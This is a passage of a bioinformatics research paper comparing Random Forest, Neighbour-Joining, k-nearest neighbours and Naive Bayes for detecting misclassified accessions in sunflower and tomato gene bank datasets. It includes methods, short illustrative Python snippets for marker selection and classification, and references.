Interestingly, Random Forest was robust enough to confirm the a priori classifications despite this unfortunate artefact of the imputation method. This finding demonstrates the robustness of Random Forest classification, but also the sensitivity of the Random Forest outlier detection technique. Still, we do not recommend using the Random Forest outlier detection technique on datasets with missing values imputed using the most common allele at each unknown locus, because the combination seems especially prone to false positives. NJ-based outlier detection fared much better. All accessions marked as outlying, with the exception of pet02, were found to be a different species by Random Forest and 3-NN classification. At first glance [see Additional file 1] pet02 seems distant from the cluster of other Helianthus petiolaris, but rotation of subtrees could position it much closer. How close is close enough to not be considered an outlier? This is a technique that relies on human judgment, and this accession shows that interpreting phylogeny through trees can be rather tricky. Instead of this technique, we recommend using classification methods as outlined in the section "Practical Recommendations".

Challenges in species classification

Some of the species represented in the datasets are notably harder to classify than others with similar species representation, tomato species S. corneliomulleri and S. peruvianum sensu stricto in particular. Nearly all classification mistakes involving these species mixed up the two (Table 3). These are two of the four species into which S. peruvianum sensu lato was recently split [51, 52]. Peralta et al. describe their approach towards this delineation as combining morphological, molecular, and ecological data, as well as having relied on clear morphological discontinuities to define entities.
However, none of the strict consensus trees presented by Peralta et al., based on either GBSSI gene sequences, AFLP data, or morphological characters, show delineation between these two species. This finding has since been reproduced several times [43, 53, 54]. Moreover, no significant difference between the environments S. corneliomulleri and S. peruvianum s.s. inhabit was found either. This lack of delineation clearly affected the distance-based methods 1-NN and NJ, whereas 3-NN appears somewhat more successful. Peralta et al. cite incomplete lineage sorting as an explanation, a characteristic that would indeed foil distance-based methods such as phylogenetic trees, but should have left a supervised machine learner like RF mostly unaffected. Random Forest, however, was not able to distinguish these species any better than 3-NN. In a converse but similar case, a recent study on gene flow between sunflower species H. petiolaris and H. neglectus found it unlikely that these two populations represent distinct isolated gene pools. The authors therefore argued that the populations currently recognized as H. neglectus do not warrant recognition as a distinct species, but should instead be recognized as a subspecies of H. petiolaris. Despite this finding, RF, NJ, and 3-NN distinguished H. petiolaris and H. neglectus with success (Table 2). While the sample sizes of this experiment are insufficient to draw conclusions, these findings suggest it might be fruitful to use classification methods alongside statistical methods when testing whether populations possess distinctive qualities.

The variable success of Naive Bayes

When comparing Table 4 with Table 3, it is evident that the prediction success of Naive Bayes is highly variable. Comparison of its performance on Solanum lycopersicum (Additional file 4) and Helianthus annuus (Additional file 5) suggests that this variability is not solely due to species representation. Rish et al.
(2001) show that Naive Bayes reaches its best performance in two opposite cases: completely independent features and functionally highly dependent features. In species classification, these might translate to the following optimal cases: classification of a trait unrelated to lineage (completely independent), or classification in species with very low intraspecific diversity (highly dependent). This hypothesis would be consistent with the good classification performance on S. lycopersicum, as the accessions that represent it are all cultivated material with very low diversity, and with the poor performance on Helianthus annuus, the progenitor of cultivated sunflower, which has one of the highest rates of genetic diversity among wild sunflowers.

Options for marker selection

There are no definite guidelines on how best to select markers from resequenced datasets and reduce them to a computationally more manageable number. We briefly tested two different strategies, namely (1) applying a strict filter to select only what one would perceive as high-quality markers, and (2) randomly thinning the markers to a desired number. In the resequenced tomato dataset, we found that filtering the markers (as opposed to thinning) led to a marked decrease in classifier performance (median prediction accuracy across classifiers of 0.91 vs. 0.73). In the resequenced sunflower dataset we found the opposite effect (0.82 vs. 0.90). By testing both strategies and choosing the marker selection with the best results, we were able to achieve good prediction accuracy for all complete datasets. We therefore believe these strategies to be sufficiently sound for use in species classification. These strategies can be implemented using command line variant filtering tools such as VCFTools or Plink (which are very fast but currently only available on Linux or MacOS), or on Windows machines using R [59, 60] or Python.
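The two strategies were applied with VCFTools and Plink in the study itself; purely for illustration, they can be paraphrased on an in-memory genotype table. The function names, thresholds, and data layout below are hypothetical, not taken from the study's pipeline.

```python
import random

def filter_markers(genotypes, max_missing=0.2, min_maf=0.01):
    """Strategy 1: keep only markers that pass quality thresholds.

    genotypes maps marker name -> list of allele calls (0/1, or None
    for a missing call in a given accession).
    """
    kept = {}
    for name, calls in genotypes.items():
        missing = sum(c is None for c in calls) / len(calls)
        observed = [c for c in calls if c is not None]
        if not observed:
            continue
        p = sum(observed) / len(observed)   # frequency of the "1" allele
        if missing <= max_missing and min(p, 1 - p) >= min_maf:
            kept[name] = calls
    return kept

def thin_markers(genotypes, target, seed=42):
    """Strategy 2: randomly thin the markers to a manageable number."""
    rng = random.Random(seed)
    chosen = rng.sample(sorted(genotypes), min(target, len(genotypes)))
    return {name: genotypes[name] for name in chosen}
```

Filtering discards markers with too many missing calls or a minor allele frequency below the cut-off, while thinning keeps a random subset regardless of quality, which mirrors the trade-off observed above.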
Additionally, other options exist for marker selection, including using only variant sites present in orthologous genes, variant pruning based on linkage disequilibrium, or even reference-free comparisons [62,63,64,65]. Reference-free strategies are expected to be less successful as genome coverage drops, and will require the raw sequence reads (fastq files) instead of variant call files, but may otherwise be very effective in species lacking a reference genome. Among reference-free methods, DiscoSNP++ in particular prides itself on its user-friendliness, as it needs relatively little RAM and computational time, and could therefore be run on a desktop computer. Overall, the choice for any particular method may be constrained by user expertise, computational capacity, sequencing depth and quality, and the availability of a suitable reference genome. Gene banks play a crucial role in securing genetic diversity for research and breeding, now and in the future. The collection and correct classification of crop wild relatives is an important aspect of this work. Classifying accessions based on morphological features alone, however, is time-consuming and error-prone. As collections of crop wild relatives are increasingly genotyped and sequenced, this creates an excellent opportunity for gene banks to improve the quality of their documentation by identifying and correcting misclassifications. Gold standard datasets, however, are lacking for many crops and crop wild relatives. As such, the ambitious premise of this work was to find the best method for species classification, regardless of species, inclusion of wild relatives, or genotyping method, while working with imperfectly classified datasets. We found that a conservative variety of 3-Nearest Neighbours is particularly suited to improve the quality of a bad dataset, and is a significant improvement over Neighbour-Joining, which represents the current phylogenetic methodology to address misclassifications.
Based on its performance on the three complete datasets, we feel confident that this variety of 3-Nearest Neighbours will reliably perform well on a large variety of datasets. There are still more avenues to explore regarding the use and improvement of bad training data in species classification tasks, but based on this research, we have formulated practical recommendations that can be used immediately by curators of genetic resources collections. Furthermore, based on these findings and recommendations, a simple software tool could be developed to assist plant genetic resources curators in identifying potential misclassifications, using the current classifications and genomic data. Such a tool could eventually be developed further to study other descriptors, such as disease susceptibility, and to predict the likelihood of accessions being resistant and the likelihood of the prediction being correct. This has the potential to increase the quality of gene bank documentation tremendously, and thus increase the value of these priceless plant genetic resources. To identify the flaws of various classification methods, we used curated but highly diverse datasets of sunflower. We artificially varied species representation (number of accessions per species) and misclassification rate (fraction of misclassified accessions) in these datasets, and used five different classification methods to correct the misclassifications introduced. We then verified the generic value of these methods by applying them to three complete datasets. We selected classification methods based on their success in DNA barcoding studies, and aimed for diversity in methodology. This resulted in the selection of Random Forest, NJ, k-NN, and Naive Bayes. The first three were the most promising methods in the comparison study of Austerlitz et al., whereas Naive Bayes was one of the best performers in the study of Weitschek et al.
These methods broadly constitute three types of approaches: distance methods (k-NN), phylogenetic methods (NJ), and supervised machine learners (Random Forest, Naive Bayes). In these comparisons, NJ is representative of the commonly used methodology to correct misclassifications in diverse datasets, as such corrections are currently based on phylogenetic analysis. As gene banks often work with species for which there are currently no gold standard classified datasets, the aim of this research is to find classification methods that can learn from bad training data, in such a way that they can improve the quality of the same data by reducing the number of misclassifications. We use a curated dataset with artificially introduced misclassifications to verify whether models can actually improve the quality of the data, or whether they will output the same or even worse quality data when working with a bad training dataset. Random Forest is an algorithm that combines hundreds or thousands of decision trees, trains each one on a slightly different set of observations through bootstrapping, and splits each decision node based on a random subset of features (e.g. molecular markers). The forest classifies new samples by funneling them down all decision trees, and adopting the classification proposed by the majority of the trees. This averaging of predictions (called bagging, or bootstrap aggregating), combined with the bootstrapping of the observations, improves the stability and accuracy of predictions, and helps to avoid over-fitting. To implement the Random Forest algorithm, the R package ranger was used. This package is true to the original algorithm, but boosts computational efficiency through parallel processing. ranger was run with replacement, with 10,000 trees, the default mtry value of √p, and the Gini impurity split rule. Samples were classified by ranger internally, using only the trees for which each sample was out of bag.
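The out-of-bag mechanism rests on the fact that a bootstrap sample of size n leaves out any given observation with probability (1 - 1/n)^n, which approaches e^(-1) ≈ 0.368 for large n. This small stand-alone simulation (not part of the original analysis) confirms the figure for a dataset of 280 accessions and 10,000 trees:

```python
import math
import random

def oob_fraction(n, n_trees, seed=1):
    """Fraction of bootstrap samples (trees) for which observation 0
    is out of bag, i.e. never drawn into that tree's training set."""
    rng = random.Random(seed)
    oob = 0
    for _ in range(n_trees):
        bootstrap = [rng.randrange(n) for _ in range(n)]  # draw n with replacement
        if 0 not in bootstrap:
            oob += 1
    return oob / n_trees

# (1 - 1/n)**n tends to e**-1 ~= 0.368 as n grows
frac = oob_fraction(n=280, n_trees=10_000)
```

With these numbers, each accession is out of bag for roughly 3,700 of the 10,000 trees.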
This means that each sample was effectively classified by 0.368 × 10,000 = 3,680 trees, hence the high number of trees initially chosen. Because Random Forest does not allow for any missing data, values were imputed with the na.roughfix function from the R package randomForest. This method replaces the missing allele at each site with the most common one. Although this imputation method is not very sophisticated, it is very fast, makes no assumptions about the data, and works independently of any class information. Neighbour-Joining (NJ) is a phylogenetic clustering method that constructs a tree from a distance matrix. This method was implemented using the functions dist.gene and nj from the R package APE, together with a script to classify the samples based on the constructed NJ tree. This script was based on the description of Austerlitz et al. in their paper comparing various classification methods for DNA barcode analysis. The distance matrix was computed with dist.gene with pairwise deletion enabled. With this option, dist.gene constructs a distance matrix by determining the number of divergent sites through pairwise comparison, discarding the markers for which data of one or both samples are missing. The classification script reads the NJ tree and assigns the query sample the majority species of the smallest subtree it occurs in. If no majority is found, the process is repeated with the second smallest subtree the query occurs in. If no majority species emerges in this subtree either, the query is determined to be ambiguous.

k-nearest neighbours classification

We used two different Nearest Neighbours strategies, which vary in k number and distance measure. The first strategy is 1-Nearest Neighbour (1-NN), which assigns the query sample to the species of the most similar sample within the examined dataset. This strategy causes a problem when two nearest neighbours do not share the same identity.
Take, for example, a case of two neighbouring samples of the same species, where one a priori classification is correct and the other incorrect. 1-NN will assign the correct identity to the misclassified sample, but then assign the incorrect identity to the other sample. Nevertheless, we included 1-NN to put the results of other classification methods into perspective, because we consider a method that cannot outperform 1-NN unsuitable for implementation. To our knowledge, there is no R package that offers nearest neighbour classification with built-in leave-one-out cross-validation, so a custom function was written that computes the distance matrix only once, and then classifies the accessions while ignoring each query sample's a priori classification. Distance between samples was determined by APE's dist.gene function with pairwise deletion enabled. dist.gene performs a pairwise comparison for all samples and presents a conservative estimate of the number of divergent sites by ignoring all sites with missing values for one or both samples. The most similar sample is then selected and its species identity is assigned to the query sample. The second strategy is a conservative variety of 3-Nearest Neighbours (3-NN), which includes the query sample itself among the three selected neighbours. The inclusion of the query sample among the neighbours increases the burden of evidence to overturn the a priori classification, as only one neighbour is needed to confirm it, while two are needed to overturn it in a majority vote. Simultaneously, this decreases the bare minimum of accessions a species needs for unambiguous classification from 3 to 2. If there are ties for the third nearest sample, all candidates are included in the vote. If no majority is reached, the sample is classified as ambiguous. 3-NN was implemented using the knn function from the R package class, using k = 3, l = 2, and use.all = TRUE.
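The conservative voting scheme can be made concrete. The study used class::knn in R; the following is a simplified, hypothetical Python re-implementation of the voting logic only (divergent-site distance, query included among its own neighbours, ties for the last spot all included):

```python
from collections import Counter

def conservative_3nn(samples, labels, qi):
    """Conservative 3-NN: the query itself is one of its own three
    neighbours, so one outside neighbour suffices to confirm the a
    priori label, while two are needed to overturn it."""
    dist = lambda a, b: sum(x != y for x, y in zip(a, b))
    others = sorted((dist(samples[qi], samples[j]), j)
                    for j in range(len(samples)) if j != qi)
    cutoff = others[1][0]        # distance of the 2nd-nearest other sample
    # query vote + all other samples tied within the cutoff
    votes = [labels[qi]] + [labels[j] for d, j in others if d <= cutoff]
    (top, n), *rest = Counter(votes).most_common()
    if rest and rest[0][1] == n:
        return "ambiguous"       # no majority among the votes
    return top
```

For example, with samples `[(0,0), (0,0), (0,0), (1,1)]` labelled `["a", "a", "b", "b"]`, the third sample's "b" label is overturned to "a" by its two identical neighbours, while a lone deviating neighbour cannot overturn a label on its own. (The R knn function itself uses a Euclidean distance rather than a divergent-site count.)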
The knn function uses Euclidean distance to determine similarity, instead of the number of divergent sites as used for 1-NN and NJ. Because this function does not allow missing data, missing data were imputed in the same manner as for Random Forest.

Naive Bayes classifier

The Naive Bayes classifier is a probabilistic classifier based on Bayes' theorem. Bayes' theorem describes the probability of example E being a member of class C, based on prior knowledge of prediction features that might be related to this class. For example, if cancer is related to age, then with Bayes' theorem, a person's age can be used to assess the likelihood of them having cancer more accurately than would be possible without this knowledge. The "naive" aspect of this classifier results from its assumption that each predictor is independent of all others. In our study, this amounts to disregarding linkage between markers. The independence assumption of Naive Bayes is rarely warranted, but the classifier works surprisingly well in practice. Zhang (2004) explored potential causes of this paradox and showed that Naive Bayes does not need true independence of predictors to perform optimally, but rather demands an even distribution of dependencies in classes, or dependencies that cancel each other out. In DNA barcode classification, Naive Bayes has been found successful. The authors note that ignoring dependence between predictors can lead to poorly estimated class probabilities, but will still result in correct classifications if the correct group is the most probable. The Naive Bayes model was created with the naiveBayes function from the R package e1071, using a value of 1 for Laplace smoothing. Predictions were made using the predict function from e1071. The Naive Bayes classifier can handle missing data, but performs much better with a well-imputed dataset. Missing data were therefore handled in the same manner as for Random Forest, i.e.
by imputing the most common allele at each site. The datasets selected for the evaluation of classification methods were chosen based on the high number of crop wild relatives they include, as well as their respective differences in species representation. The characteristics of the datasets are summarized in Table 5. The dataset chosen to create the curated datasets is a resequenced sunflower dataset, which includes 22 wild sunflower species. Of these species, 8 are represented by 10 or more accessions. The median number of accessions per species is 6.5. To simplify analyses and boost computation speed, the variant sites were filtered for > 80% call rate, > 1% minor allele frequency, no indels, and a minimum of 200,000 reads per accession using VCFTools version 0.1.15. Additionally, individual genotypes were filtered to remove calls with < 5 reads. After filtering, 15,285 out of 545,531 sites, and 280 out of 288 accessions remained. The tomato dataset was resequenced with a mean coverage of 36-fold, and includes accessions from 13 different species. The dataset also contains raw reads and variant call files from accessions that were excluded from the original publication. These were excluded when further analysis revealed admixed ancestry (R Finkers, personal communication, February 7, 2019). We chose to use only the accessions of which the species identity was verified, and merged all single sample files using VCFTools. Due to the high coverage of this dataset, it was especially important to reduce the number of variant sites for computational efficiency. To reduce the number of variant sites to a maximum of 100,000, we briefly tested two strategies, namely (1) applying a strict filter (> 80% call rate, > 1% minor allele frequency, and no indels, which kept 1.9 million out of 71.1 million variant sites) and subsequently randomly thinning to 100,000 using Plink2.0, and (2) randomly thinning all 71.1 million unfiltered variant sites using Plink2.0.
We found that, for this dataset, median prediction accuracy across classifiers markedly improved (0.91 vs. 0.73) when applying the second strategy rather than the first. We therefore proceeded with this dataset using strategy 2. The resequenced tomato dataset includes 13 different species and features a major class imbalance, with 50 out of 80 accessions belonging to Solanum lycopersicum. Among the species with less representation are S. corneliomulleri and S. galapagense, both represented by 1 accession, and seven more species that are represented by 2 accessions. This leads to a median species size of only 2. The distribution of species in the AFLP tomato dataset by Zuriaga et al. is less extreme. It includes 14 different species, and 3 hybrid accessions. S. pimpinellifolium is represented by 26 accessions, and S. galapagense by 2. The other species lie somewhere in between (median = 9). The AFLP marker data were received from Zuriaga upon request. We received present/absent scoring for 245 markers in Genetix format, a format actually designed for diploid data. Thirteen of these markers had heterozygous data, which is odd because AFLP markers are dominant. Zuriaga agreed these were erroneous, but retrieving the data as used for analysis 10 years ago proved difficult (personal communication, June 27, 2019). We removed all markers with heterozygous data, as well as another 13 markers with a minor allele frequency below 1%. This resulted in 219 markers for analysis. The accession numbers of the accessions used, their a priori classifications, and the predictions of all classifiers for the resequenced tomato dataset, the sunflower dataset, and the AFLP tomato dataset can be found in Additional files 4, 5, and 6, respectively.

Treatment of curated sunflower dataset

The number of informative SNPs present in a given genomic dataset may vary greatly depending on genotyping technique, data processing, and not least, crop properties.
To investigate the effects of species representation and misclassification rate (and isolate them as much as possible), we selected a single expansive dataset in which to artificially vary species representation and misclassification rate. Firstly, the accessions of all species with fewer than 10 accessions were removed. The remaining material was imported into R. To avoid the confounding effect of a priori misclassifications, the dataset was screened for outliers using two very different techniques: visual inspection of a neighbour-joining tree, and a Random Forest-based outlier detection method. For the latter, the functions randomForest and outlier from the R package randomForest were used. First, Random Forest was run with ntree = 50,000 and proximity set to TRUE to obtain a proximity matrix of the data. This matrix describes the similarity of two individuals by counting how often they land in the same terminal node of a tree. With this matrix and the original classifications, the outlier function then determines which individuals have small proximities to all other cases in their class, relative to the proximities these cases have to each other. Visual inspection of the neighbour-joining tree revealed 4 potentially misclassified accessions (Additional file 2). Using the recommended threshold of 10, the Random Forest outlier detection method flagged 6 accessions as potential outliers (Additional file 3). These accessions were all excluded from further analysis, as were the remaining H. exilis accessions, because their group size dropped below 10. After this selection, 199 accessions from 8 species remained. From this material, 10, 8, 6, 4, and 2 samples were randomly selected from each species. These populations were used to examine model performance under varying levels of species representation.
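The proximity-based outlier measure can be sketched as follows. This is a hypothetical Python paraphrase of the measure as commonly described for the randomForest package (per class, n divided by the sum of squared proximities to same-class cases, centred on the class median and scaled by the median absolute deviation), applied here to a hand-made proximity matrix rather than one derived from an actual forest:

```python
from statistics import median

def outlier_scores(prox, labels):
    """Proximity-based outlyingness: raw score = n / sum of squared
    proximities to same-class cases, then centred on the class median
    and scaled by the class median absolute deviation."""
    n = len(labels)
    raw = []
    for i in range(n):
        s = sum(prox[i][j] ** 2 for j in range(n)
                if labels[j] == labels[i] and j != i)
        raw.append(n / s if s > 0 else float("inf"))
    scores = [0.0] * n
    for cls in set(labels):
        idx = [i for i in range(n) if labels[i] == cls]
        med = median(raw[i] for i in idx)
        mad = median(abs(raw[i] - med) for i in idx) or 1.0  # avoid dividing by 0
        for i in idx:
            scores[i] = (raw[i] - med) / mad
    return scores
```

A sample that shares few terminal nodes with the rest of its class gets a large score, which is then compared to a threshold such as the value of 10 used above.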
Simulation of misclassifications

The goal of this part of the research is to determine which methods are most suited to correct misclassifications in genomic datasets, without the use of a gold standard dataset. To simulate these misclassifications, the species names of 6.25%, 12.5% and 18.75% of the samples were randomly altered to a random different species name from the dataset. These random alterations were introduced 5,000 times for each misclassification rate and each level of species representation. Each time, classifiers made predictions based on the same sets of a priori (mis)classifications. A total of 75,000 datasets were analyzed, comprising 5 different levels of species representation, 3 rates of misclassification, and 5,000 replications.

Classifier comparison on curated datasets

To quantify classifier performance, we used prediction accuracy. Prediction accuracy is a simple and intuitive metric, defined as the number of correct predictions divided by the number of samples. Ambiguous predictions were excluded from the calculation. It must be noted, however, that prediction accuracy as a summary metric must be treated with caution, as this metric is very sensitive to strong variation in the number of accessions per species. Good alternatives to prediction accuracy in imbalanced datasets are the Matthews correlation coefficient (for binary predictions) and the lesser-known RK statistic (for multiclass predictions) [46, 47]. In this case we were able to use prediction accuracy because we consistently represented all species by the same number of accessions in the curated datasets. To test the null hypothesis that all classifiers show identical performance under all circumstances, prediction accuracies were grouped by misclassification rate and sample size, and tested using Friedman Aligned Ranks.
Like the Friedman test, this is a non-parametric test that makes no assumptions about the distribution or variance of the data, and hence was considered appropriate to test the null hypothesis. Friedman Aligned Ranks has been shown to perform better than the Friedman test when the number of classifiers is low, i.e. no more than 4 or 5. To correct for multiple testing, each p-value was corrected with the Finner test. This test has greater power than the conservative Bonferroni-Dunn test, and similar power to Holm, Hochberg, Hommel, Holland, and Rom, while having a simpler design. If the adjusted p-value was below 0.05, it was followed up by a multiple comparison with the classifier with the highest mean accuracy as control. These statistical tests and comparisons were performed in R, using the R package scmamp, which was developed specifically for the statistical comparison of multiple algorithms.

Classifier comparison on complete datasets

For the comparison on the complete datasets, we also used prediction accuracy. To prevent bias towards classifiers that perform well on large classes, we looked not only at the overall prediction accuracy, but also at the performance per species. Prediction accuracy per species is defined as the number of correct predictions per species, divided by the total number of accessions belonging to that species. Ambiguous predictions, as are sometimes made by NJ and 3-NN, are again excluded from the calculation. The complete datasets are used without any modification, as their purpose is only to confirm whether the conclusions from the curated datasets hold and appear generalizable. For the supervised machine learners (RF and NB) we acquired an unbiased estimate of prediction accuracy. We used the out-of-bag prediction accuracy as the estimate for Random Forest, and used leave-one-out as a sampling strategy for Naive Bayes.
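The simulation and the two accuracy metrics described above can be paraphrased in a few lines. The original analysis was run in R; this is an illustrative Python sketch of one replication, with the assumption that ambiguous predictions are dropped from both numerator and denominator:

```python
import random

def induce_misclassifications(labels, rate, seed=0):
    """Relabel a fraction `rate` of accessions to a randomly chosen
    *different* species already present in the dataset."""
    rng = random.Random(seed)
    species = sorted(set(labels))
    corrupted = list(labels)
    n_flip = round(rate * len(labels))
    for i in rng.sample(range(len(labels)), n_flip):
        corrupted[i] = rng.choice([s for s in species if s != labels[i]])
    return corrupted

def prediction_accuracy(truth, predicted):
    """Correct predictions / samples, ambiguous predictions excluded."""
    scored = [(t, p) for t, p in zip(truth, predicted) if p != "ambiguous"]
    return sum(t == p for t, p in scored) / len(scored)

def accuracy_per_species(truth, predicted):
    """prediction_accuracy computed separately for each species."""
    out = {}
    for sp in sorted(set(truth)):
        pairs = [(t, p) for t, p in zip(truth, predicted)
                 if t == sp and p != "ambiguous"]
        if pairs:
            out[sp] = sum(t == p for t, p in pairs) / len(pairs)
    return out
```

Relabelling 25% of a 16-accession dataset, for instance, flips exactly 4 labels, and comparing the corrupted labels against the originals then yields a prediction accuracy of 0.75.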
Availability of data and materials

The resequenced sunflower data used for this study are available from the Sunflower Genome Database: https://sunflowergenome.org/diversity/. The sequence reads and associated analyses of the resequenced tomato data used for this study are available in the European Nucleotide Archive (http://www.ebi.ac.uk/ena/) under accession number PRJEB5235. The AFLP marker data of tomato used for this study were received from Zuriaga. The authors have permission to redistribute these data upon request. All data generated during this study are included in this published article and its supplementary information files.

References

1. FAO. The Second Report on the State of the World's Plant Genetic Resources for Food and Agriculture. Rome; 2010. p. 87.
2. Hajjar R, Hodgkin T. The use of wild relatives in crop improvement: a survey of developments over the last 20 years. Euphytica. 2007;156(1–2):1–3.
3. Ribaut JM, Hoisington D. Marker-assisted selection: new tools and strategies. Trends Plant Sci. 1998;3(6):236–9.
4. Kaplan Z. Phenotypic plasticity in Potamogeton (Potamogetonaceae). Folia Geobotanica. 2002;37(2):141–70.
5. Široký P, Fritz U, Türkozan O, Wink M, Lehmann J, Mazanaeva L, Auer M, Kami H, Hundsdörfer A. Phenotypic plasticity leads to incongruence between morphology-based taxonomy and genetic differentiation in western Palaearctic tortoises (Testudo graeca complex; Testudines, Testudinidae). Amphibia-Reptilia. 2007;28(1):97–121.
6. Barbuto M, Galimberti A, Ferri E, Labra M, Malandra R, Galli P, Casiraghi M. DNA barcoding reveals fraudulent substitutions in shark seafood products: the Italian case of "palombo" (Mustelus spp.). Food Res Int. 2010;43(1):376–81.
7. Hebert PD, Cywinska A, Ball SL, Dewaard JR. Biological identifications through DNA barcodes. Proc R Soc Lond Ser B Biol Sci. 2003;270(1512):313–21.
8. Adamowicz SJ. International Barcode of Life: evolution of a global research community. Genome. 2015 Aug 17;58(5):151–62.
9. Ratnasingham S, Hebert PD.
BOLD: The Barcode of Life Data System (http://www.barcodinglife.org). Molecular Ecology Notes. 2007 May;7(3):355–64.
10. DeSalle R, Egan MG, Siddall M. The unholy trinity: taxonomy, species delimitation and DNA barcoding. Philos Trans R Soc B Biol Sci. 2005;360(1462):1905–16.
11. Hebert PD, Penton EH, Burns JM, Janzen DH, Hallwachs W. Ten species in one: DNA barcoding reveals cryptic species in the neotropical skipper butterfly Astraptes fulgerator. Proc Natl Acad Sci. 2004;101(41):14812–7.
12. Hebert PD, Stoeckle MY, Zemlak TS, Francis CM. Identification of birds through DNA barcodes. PLoS Biol. 2004;2(10):e312.
13. Clare EL, Lim BK, Fenton MB, Hebert PD. Neotropical bats: estimating species diversity with DNA barcodes. PLoS ONE. 2011;6(7):e22648.
14. Ward RD, Zemlak TS, Innes BH, Last PR, Hebert PD. DNA barcoding Australia's fish species. Philos Trans R Soc B Biol Sci. 2005;360(1462):1847–57.
15. Wang G, Li C, Guo X, Xing D, Dong Y, Wang Z, Zhang Y, Liu M, Zheng Z, Zhang H, Zhu X. Identifying the main mosquito species in China based on DNA barcoding. PLoS ONE. 2012 Oct 10;7(10):e47051.
16. Kress WJ, Erickson DL. A two-locus global DNA barcode for land plants: the coding rbcL gene complements the non-coding trnH-psbA spacer region. PLoS ONE. 2007 Jun 6;2(6):e508.
17. Eberhardt U. Methods for DNA barcoding of fungi. In: DNA Barcodes. Humana Press, Totowa, NJ; 2012. p. 183–205.
18. Evans N, Paulay G. DNA barcoding methods for invertebrates. In: DNA Barcodes. Humana Press, Totowa, NJ; 2012. p. 47–77.
19. Vences M, Nagy ZT, Sonet G, Verheyen E. DNA barcoding amphibians and reptiles. In: DNA Barcodes. Humana Press, Totowa, NJ; 2012. p. 79–107.
20. Kress WJ, Erickson DL, Jones FA, Swenson NG, Perez R, Sanjur O, Bermingham E. Plant DNA barcodes and a community phylogeny of a tropical forest dynamics plot in Panama. Proc Natl Acad Sci. 2009 Nov 3;106(44):18621–6.
21. Kress WJ, García-Robledo C, Uriarte M, Erickson DL. DNA barcodes for ecology, evolution, and conservation. Trends Ecol Evol.
2015 Jan 1;30(1):25–35.
22. Cohen WW. Fast effective rule induction. In: Machine Learning Proceedings 1995. Morgan Kaufmann; 1995. p. 115–123.
23. Bertolazzi P, Felici G, Weitschek E. Learning to classify species with barcodes. BMC Bioinformatics. 2009 Nov 1;10(S14):S7.
24. Ross HA, Murugan S, Sibon Li WL. Testing the reliability of genetic methods of species identification via simulation. Syst Biol. 2008 Apr 1;57(2):216–30.
25. Anderson MP, Dubnicka SR. A sequential naive Bayes classifier for DNA barcodes. Stat Appl Genet Mol Biol. 2014 Aug 1;13(4):423–34.
26. Austerlitz F, David O, Schaeffer B, Bleakley K, Olteanu M, Leblois R, Veuille M, Laredo C. DNA barcode analysis: a comparison of phylogenetic and statistical classification methods. BMC Bioinformatics. 2009 Nov;10(14):S10.
27. Weitschek E, Fiscon G, Felici G. Supervised DNA Barcodes species classification: analysis, comparisons and results. BioData Mining. 2014 Dec;7(1):4.
28. van Velzen R, Weitschek E, Felici G, Bakker FT. DNA barcoding of recently diverged species: relative performance of matching methods. PLoS ONE. 2012 Jan 17;7(1):e30490.
29. Monaghan MT, Balke M, Pons J, Vogler AP. Beyond barcodes: complex DNA taxonomy of a South Pacific Island radiation. Proc R Soc B Biol Sci. 2005 Dec 19;273(1588):887–93.
30. Nelson LA, Wallman JF, Dowton M. Using COI barcodes to identify forensically and medically important blowflies. Med Vet Entomol. 2007 Mar;21(1):44–52.
31. Whitworth TL, Dawson RD, Magalon H, Baudry E. DNA barcoding cannot reliably identify species of the blowfly genus Protocalliphora (Diptera: Calliphoridae). Proc R Soc B Biol Sci. 2007 May 1;274(1619):1731–9.
32. Breiman L. Random forests. Machine Learn. 2001 Oct 1;45(1):5–32.
33. Wright MN, Ziegler A. ranger: a fast implementation of random forests for high dimensional data in C++ and R. arXiv preprint arXiv:1508.04409. 2015 Aug 18.
34. Liaw A, Wiener M. Classification and regression by randomForest. R News. 2002 Dec 3;2(3):18–22.
35. Saitou N, Nei M.
The neighbor-joining method: a new method for reconstructing phylogenetic trees. Mol Biol Evol. 1987 Jul 1;4(4):406–25.
36. Paradis E, Claude J, Strimmer K. APE: analyses of phylogenetics and evolution in R language. Bioinformatics. 2004 Jan 22;20(2):289–90.
37. Zhang H. The optimality of naive Bayes. AA. 2004;1(2):3.
38. Meyer D, Dimitriadou E, Hornik K, Weingessel A, Leisch F, Chang CC, Lin CC, Meyer MD. Package 'e1071'. The R Journal. 2019 Jun 5.
39. Baute GJ. A genomic survey of wild Helianthus germplasm clarifies phylogenetic relationships and identifies population structure and interspecific gene flow. In: Genomics of sunflower improvement: from wild relatives to a global oil seed (Doctoral dissertation, University of British Columbia). 2015.
40. Danecek P, Auton A, Abecasis G, Albers CA, Banks E, DePristo MA, Handsaker RE, Lunter G, Marth GT, Sherry ST, McVean G. The variant call format and VCFtools. Bioinformatics. 2011 Jun 7;27(15):2156–8.
41. Tomato Genome Sequencing Consortium, Aflitos S, Schijlen E, de Jong H, de Ridder D, Smit S, Finkers R, Wang J, Zhang G, Li N, Mao L. Exploring genetic variation in the tomato (Solanum section Lycopersicon) clade by whole-genome sequencing. The Plant Journal. 2014 Oct;80(1):136–48.
42. Chang CC, Chow CC, Tellier LC, Vattikuti S, Purcell SM, Lee JJ. Second-generation PLINK: rising to the challenge of larger and richer datasets. Gigascience. 2015 Dec;4(1):7.
43. Zuriaga E, Blanca J, Nuez F. Classification and phylogenetic relationships in Solanum section Lycopersicon based on AFLP and two nuclear gene sequences. Genet Resour Crop Evol. 2009 Aug 1;56(5):663–78.
44. R Core Team. R: a language and environment for statistical computing. 2013.
45. Breiman L. Manual for Setting Up, Using, and Understanding Random Forest V4.0. https://www.stat.berkeley.edu/~breiman/Using_random_forests_v4.0.pdf (2003). Accessed 21 Jan 2020.
46. Boughorbel S, Jarray F, El-Anbari M. Optimal classifier for imbalanced data using Matthews Correlation Coefficient metric. PLoS ONE.
2017 Jun 2;12(6):e0177678.
47. Gorodkin J. Comparing two K-category assignments by a K-category correlation coefficient. Comput Biol Chem. 2004 Dec 1;28(5–6):367–74.
48. Demšar J. Statistical comparisons of classifiers over multiple data sets. Journal of Machine Learning Research. 2006;7(Jan):1–30.
49. García S, Fernández A, Luengo J, Herrera F. Advanced nonparametric tests for multiple comparisons in the design of experiments in computational intelligence and data mining: experimental analysis of power. Inf Sci. 2010 May 15;180(10):2044–64.
50. Calvo B, Santafé Rodrigo G. scmamp: statistical comparison of multiple algorithms in multiple problems. The R Journal. 2016;8(1).
51. Raduski A, Rieseberg L, Strasburg J. Effective population size, gene flow, and species status in a narrow endemic sunflower, Helianthus neglectus, compared to its widespread sister species, H. petiolaris. International Journal of Molecular Sciences. 2010 Feb;11(2):492–506.
